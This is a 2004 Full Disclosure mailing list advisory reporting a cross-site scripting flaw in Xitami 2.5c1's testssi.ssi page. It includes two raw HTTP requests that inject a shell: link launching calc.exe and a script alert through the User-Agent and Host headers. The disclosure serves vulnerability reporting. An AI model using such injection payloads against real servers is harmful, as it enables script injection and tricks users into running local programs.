Full Disclosure mailing list archives
XSS in Xitami testssi.ssi
From: "Oliver () greyhat de" <Oliver () greyhat de>
Date: Thu, 22 Jul 2004 13:11:52 +0200
Xitami Imatix testssi.ssi XSS ============================= Xitami is an easy to use and open source webserver, running on several platforms. What? ===== Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which delivers a website with the content of several SSI-variables. Within the variables "HTTP_USER_AGENT" and "HTTP_REFERER", no (sufficient) content checking is done. The content of this variables is delivered by the webbrowser, and therefore can be manipulated by the user. How? ==== Telnet (dont netcat!) to port 80: GET /testssi.ssi HTTP/1.1 Host: localhost User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A> Connection: close GET /testssi.ssi HTTP/1.1 Host: <script>alert("Please click at \"PLEASE CLICK HERE\"")</script> User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A> Connection: close Misc: ===== This_paper: www.oliverkarow.de/research/xitami25c1_testssi_XSS.txt Screenshot: www.oliverkarow.de/research/xitami25c1_1.GIF Screenshot: www.oliverkarow.de/research/xitami25c1_2.GIF Version: 2.5c1 on Windows platform .... others not tested Vendor: www.imatix.com Date: 22.07.2004 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- XSS in Xitami testssi.ssi Oliver () greyhat de (Jul 22)